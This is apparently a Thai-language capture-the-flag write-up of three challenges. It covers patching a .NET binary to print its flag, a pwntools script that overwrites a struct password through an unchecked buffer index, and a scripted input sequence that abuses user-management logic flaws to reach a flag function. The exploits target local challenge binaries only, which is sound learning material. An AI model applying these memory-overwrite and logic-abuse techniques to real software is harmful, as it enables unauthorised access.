Table of Contents#

• Nuke (100 pts)
• Not Doom (200 pts)
• Cyber User (300 pts)

Nuke (100 pts)#

ข้อนี้เขาจะให้ Program dotnet มา ก็เลยโยนเข้า dnSpy เพื่อ disassemble หลังจากลองรัน ก็จะเห็นว่าเป็น Programยิงนิวเคลียร์ซักอย่าง

ลอง find “flag” ใน dnSpy ก็จะเจอ Code ที่เอาไว้ใช้ Print Flag

1
string nuclear_launch_codes = Program.ExtractNuclearLaunchCodes();
2
Console.ForegroundColor = ConsoleColor.Red;
3
Console.WriteLine("\n\ud83d\udea8 ═══ TOP SECRET NUCLEAR LAUNCH CODES ═══ \ud83d\udea8");
4
Console.WriteLine("\ud83d\udd11 MASTER LAUNCH KEY: " + nuclear_launch_codes);
5
Console.WriteLine("\ud83d\ude80 ACTIVATION CODE: flag{" + nuclear_launch_codes + "}");

ลอง Patch Program ให้ Print Flag ตั้งแต่เริ่ม -> Compile -> Save Module

Run Program อีกรอบก็จะได้ Flag มา

Not Doom (200 pts)#

ข้อนี้โจทย์ให้ ELF file มา หลังจากลองรันก็จะเห็นว่า Option 2 ของ Program จะมีการให้ write data ลงอะไรซักอย่างแล้วก็จะเช็ค Password

ลอง disasm ด้วย ghidra ก็จะเห็นว่า Option 2 (doom_function()) ใช้ vulnerable_struct หรือ struct ใน C เก็บข้อมูลต่างๆ

1
void doom_function(void)
2
{
3
  long lVar1;
4
  long in_FS_OFFSET;
5
  int index;
6
  vulnerable_struct vuln;
7
  char input [64];
8

9
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
10
  builtin_strncpy(vuln.buffer,"Safe initial data",0x12);
11
  vuln.function_ptr = print_flag;
12
  vuln.password = 0xcafebabecafebabe;
13
  puts("\n=== Memory Exploitation Challenge ===");
14
  printf("Current password: 0x%llx\n",vuln.password);
15

16
  printf("\nEnter buffer index: ");
17
  __isoc99_scanf(&DAT_00102137,&index);
18
  printf("Enter data to write: ");
19
  __isoc99_scanf(&DAT_00102150,input);
20

21
  printf("Writing to buffer[%d]...\n",(ulong)(uint)index);
22
  strcpy(vuln.buffer + index,input);
23
  if (vuln.password == 0xdeadb33fdeadb33f) {
24
    puts("Password check passed!");
25
    puts("Calling function pointer...");
26
    (*vuln.function_ptr)();
27
  }
28
  else {
29
    printf("Password check failed!");
30
  }
31
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
32
                    /* WARNING: Subroutine does not return */
33
    __stack_chk_fail();
34
  }
35
  return;
36
}

หลังจากที่ดูข้อมูล Struct ก็จะเห็นว่ามันเก็บ password, buffer และ fn_ptr ซึ่ง password อยู่ที่ offset 0x28

ซึ่งเวลาที่ write ข้อมูล Programนำ offset ของ buffer + index ที่เราใส่เข้าไปมาใช้ในการ copy ข้อมูล แต่ buffer ใน struct offset จะเริ่มต้นที่ 0x0

1
strcpy(vuln.buffer + index,input);

เพราะงั้น offset ที่ต้องwrite เพื่อเปลี่ยน password จะเป็น 0x28 - 0x0= 0x28 หรือก็คือ 40, จากนั้นก็มาเขียน Payload

1
from pwn import *
2

3
p = process('./not_doom_local')
4
p.recvuntil(b'Choice:')
5
p.sendline(b'2')
6
p.recvuntil(b'Enter buffer index:')
7
p.sendline(b'40')
8
p.recvuntil(b'Enter data to write:')
9
p.sendline(p64(0xdeadb33fdeadb33f))
10
print(p.recvall(timeout=2).decode())

1
─$ python doom.py
2
[+] Starting local process './not_doom_local': pid 30669
3
[+] Receiving all data: Done (206B)
4
[*] Stopped process './not_doom_local' (pid 30669)
5
 Writing to buffer[40]...
6
Password check passed!
7
Calling function pointer...
8
Congratulations! Here's your flag: flag{xxxxxxx}

Cyber User (300 pts)#

ข้อนี้โจทย์ก็ให้ไฟล์ ELF มา แต่ว่ารอบนี้ Option เยอะมาก ก็เลยไป Disasm แงะหา Code ส่วนที่จะ print flag (รอบนี้ใช้ Binary Ninja เพราะ แงะง่ายกว่า)

ก็ไปเจอ function นี้ ที่เราต้องใส่ Password ให้ถูกต้องคือ P@ssw0rd เพื่อ print flag

แต่Funtion ไหนล่ะ ที่เรียกใช้ Function นี้? นั่นก็คือ system_override()

โดยมีการ check condition ดังนี้

• override_counter = 5
• access_level > 2
• authentication_attempts > 20

แต่พอไปดูที่เมนู ก็ยังไม่มีเมนูที่เรียกใช้ system_override() โดยตรง ก็ไปหาวิธีเรียกใช้ โดยตอนเริ่มProgram Programจะสร้าง User นึงที่เป็น sys_admin และเก็บ address function system_override() ไว้ที่ user id 9

ซึ่งหลังจากลองรัน แล้วเรียกใช้ Function ของ User9 ก็เป็นการ เรียก system_override() จริงๆ แถมตัวProgramก็จะเพิ่ม override_counter ขึ้นไปอีก

ทีนี้ก็มาหาวิธีการเพิ่ม access_level โดย พอ search access_level ก็เจอ Code ที่สามารถยกระดับ access_level ได้ ใน security_compliance_check()

ซึ่งจากโค้ดที่เห็นก็คือ loop check condition กับแต่ละ User ID โดยที่เราต้องทำให้ var_c > 0 เพื่อยกระดับ แต่ condition มันหมายถึงอะไรล่ะ

1
if (*(uint64_t*)(((int64_t)i << 5) + &user_registry) && !verify_profile_integrity(i))

• *(uint64_t*)(((int64_t)i << 5) + &user_registry: Check ว่า User ID อยู่ใน registry มั้ย, 1 -> อยู่, 0 -> ไม่
• !verify_profile_integrity(i): ตัวนี้มีเรียก fn โดยที่เราต้องทำให้ มัน return 0 เพื่อ จะให้ เข้า condition ได้ ซึ่งตัว verify_profile_integrity(i) Code คือ วิธีที่จะทำให้ มัน return 0 ง่ายสุด คือ ทำให้ active_flag เป็น 0 (active_flag เป็นตัวแปรที่ไปแงะมาrename อีกทีนึง) ซึ่งเราสามารถ Deactive ง่ายๆ จาก Option 4 ของ Program

ลองใช้ Option 4 เพื่อ Deactive User ก็จะเห็นว่าเรายกระดับ access_level ขึ้นไปได้

ทีนี้ต้องมาทำให้ authentication_attempts > 20 โดยที่มันจะเพิ่มทุกครั้งที่เรา create_user_profile() สำเร็จ หรือก็คือ Option 1 ใน Program

Option 1 Disasm

เราจะเห็นว่าเราจะสามารถ ใส่ User ID ได้ไม่เกิน 11 ถึงจะรวมกับ User ที่สร้างตอนProgramเริ่ม (0-5 กับ 9) รวมเป็น 7 ID เราก็เหลือแค่ 4 ID ที่สามารถสร้างได้ หรือก็คือ authentication_attempts ไม่สามารถเกิน 11 ได้ด้วยวิธีตรงๆ เพราะฉะนั้นต้องหาทางอื่นแทนสร้างตรงๆ

จาก Code เราจะเห็นว่า Program ไม่ได้เช็ค ว่า User Existed รึเปล่า แต่ Check ว่า User Active อยู่รึป่าว

1
else if (*(uint32_t*)(((int64_t)rax_29 << 5) + &active_flag))
2
{
3
    printf(&data_403de6, (uint64_t)rax_29);
4
    fflush(__TMC_END__);
5
    continue;
6
}

เพราะฉะนั้นเราก็สามารถ Spam Deactive แล้วก็สร้าง User เพื่อ เพิ่ม authentication_attempts ได้

ทีนี้เราก็จะผ่านทุก Condition ในการเรียก system_override() แล้ว ทีนี้ก็มาเขียนpayload (ขี้เกียจนั่งสแปมสร้าง User)

1
print('4\n5\n7') #Increase Access Level
2
auth = 7
3
while auth < 21:
4
  print('4\n1') # Deactive
5
  print('1\n1') # Create
6
  auth +=1
7
  pass
8
override = 0
9
while override < 5:
10
  print('5\n9') # Call system_override
11
  override +=1
12
print('P@ssw0rd') # Last Password check

พอรันก็แล้ว Pipe เข้า Program ก็จะได้ Flag